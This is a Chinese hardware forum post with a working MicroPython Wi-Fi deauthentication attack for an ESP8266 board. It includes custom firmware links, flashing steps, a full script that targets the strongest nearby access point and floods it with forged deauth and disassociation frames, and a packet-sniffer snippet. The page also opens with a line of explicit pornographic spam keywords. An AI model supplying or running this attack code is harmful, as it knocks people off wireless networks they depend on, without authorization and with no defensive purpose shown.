欧美极品高清xxxxhd,国产日产欧美最新,无码AV国产东京热AV无码,国产精品人与动性XXX,国产传媒亚洲综合一区二区,四库影院永久国产精品,毛片免费免费高清视频,福利所导航夜趣136

 找回密碼
 立即注冊

QQ登錄

只需一步,快速開始

搜索
查看: 4674|回復: 0
打印 上一主題 下一主題
收起左側

MicroPython實現wifi干擾與抓包

[復制鏈接]
跳轉到指定樓層
樓主
  0x00前言

  之前做的WIFI攻擊實驗都是基于arduino環境開發的,最近想嘗試一下使用micropython完成deautch(解除認證)攻擊。本次開發板使用的還是TPYBoardv202(某寶上有賣,30元),因為它主要的功能就是支持micropython開發。



  0x01實現原理

  a)        通過查閱資料和arduino的源碼分析,了解到實現攻擊其實就是發送IEEE802.11協議解除認證包,根據MAC層幀格式發送自定義的虛假deautch數據包。

  b)        調用ESP8266SDK中wifi_send_pkt_freedom函數,發送攻擊包。

  0x02攻擊構思

  a)        程序一開始掃描附件的AP。

  b)        找到信號最強的AP,獲取到他的MAC地址(bssid)和信道。

  c)        將TPYBoardv202切換到同攻擊AP相同的信道。

  d)        使用攻擊AP的MAC地址,組合deauth解除認證包發送。

  0x03編譯燒寫固件及程序源碼

  1、        編譯固件

  現有的micropython-esp8266固件中,并沒有引出wifi_send_pkt_freedom函數,于是

  我自己動手編譯了一次固件,地址:

  https://github.com/PakchoiFood/micropython-deauth

  大家可以自行下載燒寫使用,如果有的小伙伴想自己編譯修改固件的話,請參考:

  https://github.com/micropython/micropython/tree/master/esp8266

  需要注意:在編譯esp8266-sdk時,注意版本必須是1.3.0版本,否則wifi_send_pkt_freedom函數會一直返回-1失敗。

  下載后解壓,文件如下:



  firmware.bin文件:micropython-esp8266生成的固件。

  增加的內容:

  setAttack函數

  參數:int類型(信道)

  功能:設置esp8266的信道

  send_pkt_freedom函數

  參數:bytes數組(定義的數據包)

  flash_download_tools_v3.3.6_win.rar:燒寫固件的工具。

  MicroPythonFileUploader.rar:用于將程序下載到TPYBoardv202Flash的工具。

  main.py文件:程序源碼文件,主要實現附件AP的掃描、數據包的組合和調用發送。

  1. import time
  2. import uos
  3. import wireless


  4. sta_if=wireless.attack(0)#0:STA 模式
  5. sta_if.active(True)
  6. ap_list=sta_if.scan()
  7. print(ap_list)
  8. ssid=''
  9. bssid=''#bssid:AP MAC address
  10. channel=''#信道
  11. _client=[0xFF,0xFF,0xFF,0xFF,0xFF,0xFF]#默認

  12. def deauth(_ap,_client,type,reason):
  13.     # 0 - 1   type, subtype c0: deauth (a0: disassociate)
  14.     # 2 - 3   duration (SDK takes care of that)
  15.     # 4 - 9   reciever (target)
  16.     # 10 - 15 source (ap)
  17.     # 16 - 21 BSSID (ap)
  18.     # 22 - 23 fragment & squence number
  19.     # 24 - 25 reason code (1 = unspecified reason)
  20.     packet=bytearray([0xC0,0x00,0x00,0x00,0xBB,0xBB,0xBB,0xBB,0xBB,0xBB,0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,0x00, 0x00,0x01, 0x00])
  21.     for i in range(0,6):
  22.         packet[4 + i] =_client[i]
  23.         packet[10 + i] = packet[16 + i] =_ap[i]
  24.     #set type
  25.     packet[0] = type;
  26.     packet[24] = reason
  27.     result=sta_if.send_pkt_freedom(packet)
  28.     if result==0:
  29.         time.sleep_ms(1)
  30.         return True
  31.     else:
  32.         return False
  33.    
  34. if __name__=="__main__":
  35.     max_rssid=0
  36.     max_id=0
  37.     num=0

  38.     #獲取信號最強的AP 進行攻擊
  39.     for i in ap_list:
  40.         if max_rssid==0:
  41.             max_rssid=i[3]#rssid
  42.         else:
  43.             if i[3]>max_rssid:
  44.                 max_rssid=i[3]
  45.                 max_id=num
  46.         num+=1
  47.     ssid=ap_list[max_id][0]
  48.     bssid=ap_list[max_id][1]
  49.     channel=ap_list[max_id][2]
  50.     print('ssid:',ssid,'-bssid:',bssid)
  51.     print('-channel:',channel,'-rssid:',max_rssid)
  52.     sendNum=5000#攻擊次數
  53.    
  54.     print('******************************')
  55.     if sta_if.setAttack(channel):
  56.         print('Set Attack OK')
  57.         time.sleep_ms(100)
  58.         print('---deauth runing-----')
  59.         for i in range(0,sendNum):
  60.             r_=deauth(bssid, _client, 0xC0, 0x01)
  61.             if r_:
  62.                
  63.                 deauth(bssid, _client, 0xA0, 0x01)
  64.                 deauth(_client, bssid, 0xC0, 0x01)
  65.                 deauth(_client, bssid, 0xA0, 0x01)
  66.                 time.sleep_ms(5)
  67.             else:
  68.                 print('---deauth fail-------')
  69.             time.sleep_ms(5000)
復制代碼




  sniffer文件夾下的main.py實現網絡抓包功能。

  1. import wireless
  2. import time

  3. #可以指定信道1~13
  4. sniffer=wireless.sniffer(6)
  5. #0:表示從信道1開始 定時切換信道
  6. #sniffer=wireless.sniffer(0)
復制代碼




  燒寫固件

  1、        TPYBoardv202使用microUSB數據線接入電腦。查看安裝的usb轉串的端口。打開電腦的設備管理器(這里是COM57)。



  2、        解壓flash_download_tools_v3.3.6_win.rar,雙擊運行ESPFlashDownloadTool_v3.3.6.exe。

  3、選擇firmware.bin固件文件,地址0x00000,其他參數根據下圖設置。我的COM選擇COM57,根據自己的實際端口選擇,波特率選擇115200。



  4、點擊【START】,界面提示等待上電同步。按住板子上的FLASH鍵不松,同時按一下RST鍵復位上電。左側空白區顯示讀取的MAC地址,狀態顯示下載中,此時松開按鍵即可。



  5、等待下載完畢,關閉軟件退出。

  下載程序

  6、解壓MicroPythonFileUploader.rar,雙擊運行MicroPythonFileUploader.exe。



  此軟件需要.NETFramework4.2及以上版本,若打開失敗,請安裝.NETFramework后再使用。


  7、選擇COM57,點擊【Open】打開串口。



  8、點擊右側的文件夾圖標的按鈕,選擇main.py文件。



  9、此時可以點擊【Send】,將程序發送給TPYBoardv202。發送成功后,程序自動運行。



  10、接下來將sniffer下的main.py同樣的是方式下載到板子里。(文件會覆蓋)

  打開串口助手,就可以看到esp8266抓包的數據。





分享到:  QQ好友和群QQ好友和群 QQ空間QQ空間 騰訊微博騰訊微博 騰訊朋友騰訊朋友
收藏收藏1 分享淘帖 頂 踩
回復

使用道具 舉報

您需要登錄后才可以回帖 登錄 | 立即注冊

本版積分規則

小黑屋|51黑電子論壇 |51黑電子論壇6群 QQ 管理員QQ:125739409;技術交流QQ群281945664

Powered by 單片機教程網

快速回復 返回頂部 返回列表